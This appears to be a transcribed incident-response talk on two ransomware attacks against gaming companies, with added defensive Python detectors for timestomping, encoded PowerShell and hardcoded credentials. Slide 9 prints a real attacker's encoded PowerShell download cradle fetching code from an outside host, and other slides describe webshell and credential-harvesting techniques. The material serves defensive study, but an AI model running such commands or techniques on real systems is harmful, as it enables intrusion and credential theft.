This deck premiered at Black Hat in Las Vegas in August.
He explains two cases from the world of online gaming, in particular betting and online casinos.
These companies show two faces: on the one hand, great competence and attention to the quality of their code and the security of their portals; on the other, they do not seem to apply the same level of controls to their staff. As always, the devil is in the details, and the ransomware gangs know it well.
2. Who I Am: Stefano
• I am the Practice Manager of Netwitness (RSA) Incident Response.
• I began my ICT career in 1997 at Digital Corp, but I started to crack software in 1985 with a Commodore C64.
• I decided to get out of the cracking scene in 2000 to focus on networking… until Nimda and Blaster came out and cybersecurity became an interesting career…
• I worked on the offensive side until 2009, when I jumped onto the IR bandwagon.
• Since then, I have led engagements around the world covering investigations of sophisticated actors.
3. Agenda
❑ Introduction
❑ The first case
  ❑ Initial Compromise
  ❑ Second Phase, Second Actor
  ❑ Third Phase
  ❑ Ransomware in play
  ❑ The outcome
❑ The second case
  ❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lessons learned
5. Initial Compromise
▪ Through an active exploit of the Exchange web server, two webshells were uploaded to DC1-EXCH01 on December 9, 2021.
Diagram: Munich data center with DC1-EXCH00 and DC1-EXCH01; attacker IP 23.183.81.113; webshells Logout.aspx and iisstart.aspx. The Exchange server version was 2019 CU10.
6. Evidence of Initial Attack
▪ The proximity of the file creation times (a few milliseconds apart) in different paths confirms that the webshells were dropped through an exploit with chained payloads.
▪ Web log retention on the server was 30 days, so the logs had rolled over before the investigation started, but the webshells were likely uploaded via the exploit CVE-2021-42321, an RCE, based on the folders used to drop them.
Screenshot callouts: first webshell (basic loader); second webshell with functions to interact with files; timestomped dates.
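How the two pieces of evidence on this slide can be checked programmatically, as an added example that is not part of the deck: given MFT-style records carrying both NTFS creation timestamps (constructed here, since the slide does not list the paths), the first function flags files whose $STANDARD_INFORMATION creation time was set back (timestomping), and the second groups .aspx files created milliseconds apart in different directories, the chained-payload pattern described above.

```python
import ntpath
from datetime import datetime, timedelta

# Constructed MFT-style records (not from the case). $STANDARD_INFORMATION creation time
# can be rewritten from user mode (SetFileTime); $FILE_NAME creation time is only updated
# by the kernel, so it is the reliable one. Paths are typical Exchange-served directories
# chosen for illustration, not the paths from the investigation.
LOGOUT = r"C:\inetpub\wwwroot\aspnet_client\Logout.aspx"
IISSTART = r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\iisstart.aspx"
LOGON = r"C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\logon.aspx"
SAMPLE_RECORDS = [
    {"path": LOGOUT, "si_created": "2021-12-09T10:15:42.130000", "fn_created": "2021-12-09T10:15:42.130000"},
    {"path": IISSTART, "si_created": "2019-03-02T08:00:00.000000", "fn_created": "2021-12-09T10:15:42.137000"},
    {"path": LOGON, "si_created": "2019-03-02T08:00:00.000000", "fn_created": "2019-03-02T08:00:00.000000"},
]


def _t(value: str) -> datetime:
    return datetime.fromisoformat(value)


def find_timestomped(records, slack=timedelta(seconds=1)):
    """Paths whose $FILE_NAME creation is later than $STANDARD_INFORMATION creation:
    the visible timestamp was set back after the file was actually created."""
    return [r["path"] for r in records if _t(r["fn_created"]) - _t(r["si_created"]) > slack]


def find_chained_drops(records, window=timedelta(milliseconds=50), suffix=".aspx"):
    """Clusters of web-served files created within `window` of each other (by the reliable
    $FILE_NAME time) in more than one directory: one exploit request, several payloads."""
    events = sorted((_t(r["fn_created"]), r["path"]) for r in records
                    if r["path"].lower().endswith(suffix))
    clusters, current = [], []
    for created, path in events:
        if current and created - current[-1][0] > window:
            clusters.append(current)
            current = []
        current.append((created, path))
    if current:
        clusters.append(current)
    # Keep only clusters that span more than one directory (ntpath handles the Windows paths anywhere).
    return [[p for _, p in c] for c in clusters
            if len({ntpath.dirname(p).lower() for _, p in c}) > 1]


if __name__ == "__main__":
    print("timestomped:", find_timestomped(SAMPLE_RECORDS))
    print("chained drops:", find_chained_drops(SAMPLE_RECORDS))
```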
7. CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to issues with the validation of command-let (cmdlet) arguments.
▪ In order to exploit this flaw, an attacker would need to be authenticated.
The attack requires execution of 4 POSTs in a chain against Exchange with an authenticated user to be successful.
8. We never leaked credentials…
▪ The attacker authenticated by leveraging leaked credentials of a subcontractor working as a developer in the environment.
“Yeah, that account is mine, but it is a personal account… what is the meaning of this?... And how did you collect it???”
9. Logout.aspx Webshell
▪ This webshell is extremely simple: it makes the IIS worker process (w3wp.exe) spawn the Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe).
Command line:
"cmd.exe" /c powershell -ep bypass -e SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
Decoded:
IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
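As an added example (not from the deck), a small detector for the execution chain on this slide: it decodes the -EncodedCommand argument, accepting both the UTF-16LE form PowerShell expects and the plain ASCII form the slide's blob actually uses, and flags cmd.exe or PowerShell spawned by the IIS worker w3wp.exe. The process-creation records are constructed; the first reuses the slide's own encoded command, the second uses a placeholder host (example.invalid).

```python
import base64
import re

# Common spellings of PowerShell's -EncodedCommand switch followed by a base64 blob.
# "-ep bypass" does not match because the character after "-e" must be a switch suffix, not "p".
ENC_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Strings that mark an in-memory download cradle once the command is readable.
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "-ep bypass")
IIS_WORKERS = {"w3wp.exe"}  # the IIS worker process that hosts Exchange's web front end

# Encoded command exactly as printed on slide 9 (joined across the slide's line break).
SLIDE_BLOB = ("SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3"
              "RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=")
# Constructed UTF-16LE variant with a placeholder host: the encoding "powershell -e" normally expects.
UTF16_BLOB = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')".encode("utf-16-le")
).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand payload; accepts UTF-16LE (PowerShell's format) and plain ASCII."""
    raw = base64.b64decode(blob, validate=True)
    # UTF-16LE ASCII text has a zero byte after every character; the slide's blob does not.
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def analyse_process_event(event: dict) -> list:
    """Return the reasons a process-creation record resembles the Logout.aspx execution chain."""
    reasons = []
    parent, image, cmdline = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    if parent in IIS_WORKERS and image in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        reasons.append(f"{image} spawned by IIS worker {parent}")
    text = cmdline.lower()
    match = ENC_SWITCH.search(cmdline)
    if match:  # inspect the decoded command together with the visible switches
        text += " " + decode_encoded_command(match.group(1)).lower()
    hits = [marker for marker in CRADLE_MARKERS if marker in text]
    if hits:
        reasons.append("PowerShell download cradle markers: " + ", ".join(hits))
    return reasons


# Constructed process-creation records; the first mirrors the command line shown on slide 9.
SAMPLE_EVENTS = [
    {"parent": "w3wp.exe", "image": "cmd.exe",
     "cmdline": f'"cmd.exe" /c powershell -ep bypass -e {SLIDE_BLOB}'},
    {"parent": "services.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {UTF16_BLOB}"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\nightly_report.ps1"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["image"], "->", analyse_process_event(event) or "clean")
```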
10. Webshell Logic of iisstart.aspx
▪ The second webshell allows the attacker to interact with the system through requests containing the parameter cadataKey.
▪ If the cadataKey parameter is not specified, the webshell redirects to the errorFE.aspx page, returning an HTTP 404 code.
• The webshell included the ability to run arbitrary commands and to upload, delete, and view the contents of files.
• Once implanted, the webshell allowed the attacker to access the environment with local administration rights.
All commands specified through this parameter are executed through an eval statement.
12. Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to DC1-EXCH00 and, a few minutes later, to DC1-EXCH01.
▪ This malicious file is loaded into processes and harvests cleartext passwords in real time as various users authenticate with the Exchange server.
Diagram: Munich data center, DC1-EXCH00 (iisstart.aspx, lsass.dll) and DC1-EXCH01 (iisstart.aspx), attacker IP 23.183.81.113.
This long pause between the initial webshells and the subsequent activity could be due to the initial attacker selling access to the ransomware attacker.
13. Second Phase, Second Actor
▪ The harvested credentials are saved into a file named C:\windows\temp\tmpQWER.tmp, as user and password pairs.
▪ Hundreds of cleartext passwords were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain controllers.
Diagram: Munich data center, DC1-EXCH00 and DC1-EXCH01, each with iisstart.aspx and lsass.dll writing user/password pairs to C:\windows\temp\tmpQWER.tmp.
The DLL uses the NPLogonNotify API provided by Microsoft to extract cleartext credentials of users as they log into the servers.
14. Second Phase, Second Actor
▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a remote desktop software) on DC1-EXCH00 on 18 February 2022.
Diagram: Munich data center, DC1-EXCH00 (iisstart.aspx, atera.exe, lsass.dll) and DC1-EXCH01 (iisstart.aspx), attacker IP 23.183.81.113. Atera is an IT management solution that enables monitoring, management, and automation of IT networks from a single console.
15. How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage legitimate remote management agents (like Atera) to survive possible Cobalt Strike detections from the EDR and antivirus platforms.
▪ Relying upon a legitimate tool to achieve persistence is typically a pen tester approach, and in my personal perspective this can clarify the attacker's background.
16. How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
Diagram: Munich data center, DC1-EXCH00 (webshell, lsass.dll) and DC1-DC0001 (atera.exe, lsass.dll), attacker IP 23.183.81.113. The Atera package was uploaded on the Domain Controller of the targeted Data Center (DC1-DC0001) together with the credential dumper “lsass.exe”.
17. How to Complete the Job…
▪ On March 23, the attacker uploaded lsass.dll to DC1-EXCH01:
Diagram: Munich data center, DC1-EXCH00 (iisstart.aspx) and DC1-EXCH01 (iisstart.aspx, lsass.dll), attacker IP 23.183.81.113.
He immediately started the credential harvesting on this system.
18. Third Phase: 23 March – 5 April
▪ During this period the attacker moved laterally to various systems, including Domain Controllers, backup servers, etc.
▪ Scanning and reconnaissance on the network were executed regularly.
Diagram: from DC1-DC0001 and DC1-EXCH00 (lsass.dll, iisstart.aspx, atera.exe) the attacker scanned workstations, dev systems and the virtual infrastructure across the Munich data center and the Munich office. During this scanning the attacker identified the virtual infrastructure where critical servers were operating.
20. Status
▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less than 24 hours he collected about 12,45 Gb of data from the environment, including lots of payment and betting details.
▪ Unfortunately, up to this point, the attacker was able to work undetected. Why?
▪ To answer we should clarify the meaning and the role of an “Enabler of Compromise,” but first let’s see how the attack unfolded...
22. Ransomware in Play…
▪ 6 April 2022: the attacker executed a massive dissemination of the ransomware executable with a combination of RDP and PsExec sessions.
Diagram: ransomware distribution via RDP + PsExec from DC1-DC0001 (lsass.dll, atera.exe) to workstations, dev systems and the virtual infrastructure in the Munich data center and Munich office, and to the Toronto and Macau data centers.
23. Ransomware in Play…
▪ With a separate and tailored action, the attacker ensured the backup servers of the company were encrypted, by leveraging another variant of the ransomware.
▪ This variant was also used against the company’s ESXi servers (about 50 hosts), which adversely affected around 2000 virtual machines hosted on them.
▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”.
▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
24. Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them.
Diagram: Munich data center; from DC1-DC0001 (atera.exe) the ransomware was distributed to the virtual infrastructure via SSH sessions and installed manually on the backup infrastructure.
25. What we found: Network Forensics
▪ During the attack, the actor kept three systems untouched, in particular the Exchange server.
Diagram: DC1-EXCH00 (atera.exe), DC1-EXCH10 and DC3-SPORS2 across the Munich and Toronto data centers.
▪ This is probably due to the goal of keeping an eye on the target.
▪ In fact, the victim’s email system was still working despite the encryption of the remaining systems…
26. The Outcome
▪ It took 45 days to get rid of the whole infection, but only five days to recover basic services, allowing the company to slowly get back to business.
▪ From the end users’ perspective the attack was a significant blow to the company’s reputation and, at least initially, it impacted the overall relationship with the company’s customer base.
▪ However, the gaming world has its own rules and 45 days later it was business as normal in the company headquarters… apart from some minor, but meaningful, details:
▪ Enhanced network visibility
▪ New staff for daily monitoring of network and infrastructures…
▪ No Splashtop, TeamViewer or AnyDesk connections
▪ No scripts with hardcoded credentials
▪ New cybersecurity procedures
28. The second case: introduction
▪ This case targeted a group operating in the online casino sector with about 2.500 employees.
▪ The company has two data centers located in Australia and Hong Kong and operates mainly in the Asia-Pacific market.
▪ The cybersecurity practice inside the company at the time was mainly managed by one global MSSP and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino, and the company was applying strong controls on online services and data privacy.
▪ However, they left open several holes in their cybersecurity ecosystem…
Lots of enablers of compromise…
▪ Total lack of network visibility, both internally and in the company private cloud
▪ Lack of organized logs and limited endpoint visibility
▪ Lack of any behavior analysis at user level for internal staff
▪ Limited investigative and reactive capabilities
▪ Real-time threat detection limited to “low hanging fruits”
▪ Lack of a proper escalation plan for ICT incidents
29. Attack Preparation
▪ The attack was organized around a flow very similar to the first case presented, with the difference that this time the attacker targeted the staff with domain spoofing and spear-phishing.
Diagram (flow between attacker, online file-sharing service and victim):
▪ Register “company.us” to spoof “company.co.au”
▪ Create the employee@company.us email account
▪ Acquire the target’s email address through OSINT and send a phishing email
▪ Send a sounding email discussing business and meetings
▪ Upload the payload to the file-sharing service, sharing it with the target
▪ Send a file-sharing notification
30. Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture.
▪ The email asked to set a time for a call the following week about the content of the email.
Diagram: attacker at 44.227.65.245 targeting the Munich data center.
31. Exotic Lily + Conti in Action
Diagram (attack chain): domain spoofing and spear-phishing campaign; initial compromise and recon with BazarLoader and Cobalt Strike (write, execute).
Exotic Lily: download additional tools, perform command-line recon, harvest local and network credentials; SSL sessions to the Exotic Lily C2.
Lateral movement: PowerShell, RDP (Splashtop, AnyDesk), stolen VPN and admin credentials.
Conti: RDP toward DCs, Atera package, application servers; leaks.
32. No Doubt on Attribution…
It was absolutely easy to attribute the attack to the Conti ransomware gang; their banner spoke for itself:
34. Enablers of Compromise
▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider expansion of the radius and the magnitude of the attack.
▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc… These protocols, if exploited, could grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers or unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker can use a myriad of tools and techniques to breach an organization’s network, steal sensitive information and compromise its operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers of successful cyber attacks.
An enabler of compromise is a pre-existing condition to the attack.
35. Script with Hardcoded Credentials
We found the cron script /root/inventory_queries.sh on a critical repository containing hardcoded login credentials, as illustrated here:
Also, we found cron jobs running under the root user that used a service account, with its password included in cleartext.
36. Enablers of compromise or careless users???
Unreported TeamViewer and AnyDesk usage
During the analysis we found several systems connected to the company network with TeamViewer and AnyDesk remote control software installed. The presence of remote control software on systems connected to the network may provide additional access points that bypass existing security measures.
Cracked software
During the analysis we found evidence of systems using cracked Windows licenses.
PowerShell scripts with cleartext credentials
Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
Root password in root’s .bash_history
Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant Enabler of Compromise…
You can notice here…
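An added example, not from the deck, that scans the three kinds of artifacts named on this slide and the previous one (a root cron script, a PowerShell script and a root .bash_history) for the credential exposures described; the file contents and secrets are constructed, and findings are returned with the secret masked so the report itself does not leak it.

```python
import re

# One pattern per exposure seen on slides 35 and 36; the "secret" group captures the value so it can be masked.
PATTERNS = [
    ("variable assignment with literal password",
     re.compile(r"(?i)(?:pass(?:word|wd)?|pwd|secret)\s*=\s*['\"]?(?P<secret>[^'\"\s]+)")),
    ("mysql command with inline password",
     re.compile(r"(?i)\bmysql\b.*?\s-p(?P<secret>[^\s'\"]+)")),
    ("PowerShell plaintext ConvertTo-SecureString",
     re.compile(r"(?i)ConvertTo-SecureString\s+['\"](?P<secret>[^'\"]+)['\"]\s+-AsPlainText")),
    ("root password piped to chpasswd",
     re.compile(r"(?i)\becho\s+['\"]?root:(?P<secret>[^'\"\s|]+)['\"]?\s*\|\s*chpasswd")),
]


def mask(secret: str) -> str:
    """Keep two characters so analysts can match the finding against the file, hide the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_text(name: str, text: str) -> list:
    """Return (file, line number, kind, masked secret) for every match in one file's content."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append((name, lineno, kind, mask(match.group("secret"))))
    return findings


def scan_all(files: dict) -> list:
    return [f for name, text in files.items() for f in scan_text(name, text)]


# Constructed sample contents modelled on the artifacts named on the slides (not the real files).
SAMPLES = {
    "/root/inventory_queries.sh": (
        "#!/bin/bash\n"
        "# nightly inventory export, run from root's crontab\n"
        "DB_USER=inventory\n"
        "DB_PASSWORD='Inv3ntory!2022'\n"
        "mysql -h db01 -u \"$DB_USER\" -p\"$DB_PASSWORD\" inventory -e 'SELECT * FROM stock' > /tmp/inv.csv\n"
    ),
    "C:\\scripts\\backup.ps1": (
        "$pw = ConvertTo-SecureString \"Sv1ce-Acct-Pa55\" -AsPlainText -Force\n"
        "$cred = New-Object System.Management.Automation.PSCredential(\"CORP\\svc_backup\", $pw)\n"
    ),
    "/root/.bash_history": (
        "cd /var/backups\n"
        "mysql -u root -pR00tDbPass2022 casino_prod\n"
        "echo 'root:N3wR00tPw!' | chpasswd\n"
        "ls -la\n"
    ),
}
```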
38. It’s all about visibility… and a clean environment…
▪ The sophisticated nature of today’s threat landscape and actors continues to wreak havoc on enterprise infrastructures; to our surprise, this occurs in betting and online casino services more than expected.
▪ Visibility is the key to protecting a network by actively looking for any security gap, vulnerability, on-going cyber attack, and any anomaly or wrong usage of network resources.
▪ The rule is “If you don’t find them, you can’t fix them”.
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons why this is the case: the gaming industry may not understand the importance of network visibility, for example, or may lack the tools and resources to get started.
▪ In any case, the lack of adequate response from security teams is due to the dependency on perimeter-based security solutions that are not agile enough to deal with sophisticated threats, or to the limited spectrum of cybersecurity controls these companies enforce nowadays.
39. Visibility, Flexibility and Practice
Diagram: Comprehensive Visibility; Preparedness (Incident Response Retainer, Major Incident Practice Drills, Cyber Insurance, Recovery Planning); Proactive Detection and Response; Reactive Capabilities.